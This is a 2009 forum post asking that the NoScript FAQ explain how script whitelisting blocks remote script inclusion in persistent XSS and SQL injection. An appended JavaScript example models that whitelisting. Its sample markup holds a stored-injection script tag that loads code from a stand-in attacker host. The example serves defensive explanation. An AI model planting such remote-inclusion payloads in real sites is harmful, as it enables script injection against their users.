FAQ addition request

Post by Aspirant » Sat Dec 19, 2009 4:55 pm

The FAQ at http://noscript.net/faq#qa1_10 is very helpful for many people to understand why NoScript is necessary. Some people, however, would not be convinced by this info because they don't understand computer technology or they believe the probability of problems is small. For such people, a demonstration is helpful. I suggest adding to this FAQ a link to http://evil.hackademix.net/annoy/ along with instructions on how to terminate the browser in Windows Task Manager.

From viewtopic.php?f=8&t=2768&start=15#p11809
Giorgio Maone wrote: Script blocking (which you turn off) prevents 3rd party scripts from being included in your whitelisted site if their origins are not whitelisted as well.
This has nothing to do with Anti-XSS, but helps in most persistent XSS / SQL Injection scenarios, because using a remote inclusion is much more practical, and often the only feasible path for an attacker (e.g. if the injectable field has length constraints, see http://ha.ckers.org/blog/20080110/dimin ... st-wrapup/ ).

I suggest adding this info to the FAQ so users understand how NoScript protects them if their financial website gets hacked, and also so users understand the dangers of allowing all scripts on a page.
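Added example, not part of the original post and not NoScript's own code: a simplified model of the behaviour described in the quote, where a whitelisted page still cannot pull in a script from a host that is not itself whitelisted. The host names, the whitelist, the sample markup and the exact-host matching are assumptions made for illustration.

```javascript
// Simplified model of per-site script blocking. Not NoScript's actual code.
// Host names, whitelist and markup are constructed for illustration.
const PAGE_URL = "https://bank.example/account";
const WHITELIST = new Set(["bank.example", "cdn.bank.example"]);

// Constructed page: two legitimate scripts plus a short stored injection
// that pulls its payload from a third-party host.
const SAMPLE_PAGE = `
<script src="/js/app.js"></script>
<script src="https://cdn.bank.example/lib.js"></script>
<div class="memo"><script src=//attacker.example/x.js></script></div>`;

// Host a script loads from; inline scripts belong to the page's own host.
function scriptHost(src, pageUrl) {
  return new URL(src === null ? pageUrl : src, pageUrl).hostname;
}

// For each <script> tag, report its source host and whether it may run.
// allowAll models "allow all scripts on this page".
// The regex scan stands in for a real HTML parser (assumption).
function evaluateScripts(html, pageUrl, whitelist, allowAll = false) {
  const results = [];
  const tagRe = /<script\b([^>]*)>/gi;
  const srcRe = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const m = srcRe.exec(tag[1]);
    const src = m ? (m[1] ?? m[2] ?? m[3]) : null;
    const host = scriptHost(src, pageUrl);
    results.push({ src, host, allowed: allowAll || whitelist.has(host) });
  }
  return results;
}

for (const r of evaluateScripts(SAMPLE_PAGE, PAGE_URL, WHITELIST)) {
  console.log(`${r.allowed ? "ALLOW" : "BLOCK"} ${r.host} ${r.src}`);
}
```

With the whitelist enforced, the two bank-hosted scripts are allowed and the injected remote inclusion is blocked; passing `true` as the fourth argument shows the same injected tag being allowed when all scripts on the page are permitted.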